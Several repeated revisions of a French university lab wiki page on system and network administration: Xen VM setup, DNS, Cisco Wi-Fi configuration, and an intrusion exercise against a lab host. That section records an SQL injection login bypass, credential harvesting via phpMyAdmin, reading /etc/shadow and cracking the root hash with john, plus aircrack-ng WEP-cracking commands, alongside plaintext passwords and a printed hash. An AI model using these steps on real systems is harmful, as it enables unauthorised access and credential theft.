airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon<br />
<br />
aircrack-ng -z testwep-01.cap<br />
<br />
photo</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53808
TP sysres IMA5sc 2020/2021 G7
2020-11-16T17:17:13Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom : wlan0mon<br />
<br />
airrrrrodump-ng --encrypte<br />
<br />
rr</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53741
TP sysres IMA5sc 2020/2021 G7
2020-11-16T15:45:44Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
Modifier le fichier /etc/ssh/sshd_config<br />
On décommente pour mettre :<br />
PermetRootLogin yes<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.option<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==SSH==<br />
nano /etc/ssh/sshd_config<br />
On decommente la ligne PermissionRoot: <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
<br />
service sshd restart<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53108
TP sysres IMA5sc 2020/2021 G7
2020-11-02T17:48:25Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
==Redirection DNS==<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
<br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53097
TP sysres IMA5sc 2020/2021 G7
2020-11-02T17:32:22Z
<p>Nekhlas- : /* Configuration des bornes Wi-Fi */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
==Redirection DNS==<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
<br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53090
TP sysres IMA5sc 2020/2021 G7
2020-11-02T17:25:33Z
<p>Nekhlas- : /* Intrusion honey.plil.info */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
==Redirection DNS==<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.240<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
<br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53070
TP sysres IMA5sc 2020/2021 G7
2020-11-02T16:31:26Z
<p>Nekhlas- : /* Configuration WLC */</p>
<hr />
<div><br />
